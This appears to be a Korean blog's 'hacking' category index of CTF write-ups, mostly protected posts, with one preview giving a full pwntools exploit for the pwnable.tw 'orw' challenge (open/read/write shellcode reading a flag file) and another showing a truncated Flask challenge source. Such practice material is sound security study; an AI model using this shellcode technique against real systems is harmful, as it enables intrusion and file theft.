hacking(287)
-
dreamhack.io - cpp_string
보호되어 있는 글입니다.
2021.09.01 -
pwnable.tw - orw
쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()
2021.08.31 -
pwnable.kr - brain fuck
보호되어 있는 글입니다.
2021.08.27 -
dreamhack.io - cpp_type_confusion
보호되어 있는 글입니다.
2021.08.25 -
dreamhack.io - file-csp-1
제공된 app.py의 코드는 아래와 같습니다. #!/usr/bin/env python3 import os import shutil from time import sleep from urllib.parse import quote from flask import Flask, request, render_template, redirect, make_response from selenium import webdriver #from flag import FLAG APP = Flask(__name__) @APP.route('/') def index(): return render_template('index.html') @APP.route('/test', methods=['GET', 'POST']) def test_..
2021.08.24 -
cryptohack.org - Encoding Challenge
보호되어 있는 글입니다.
2021.08.20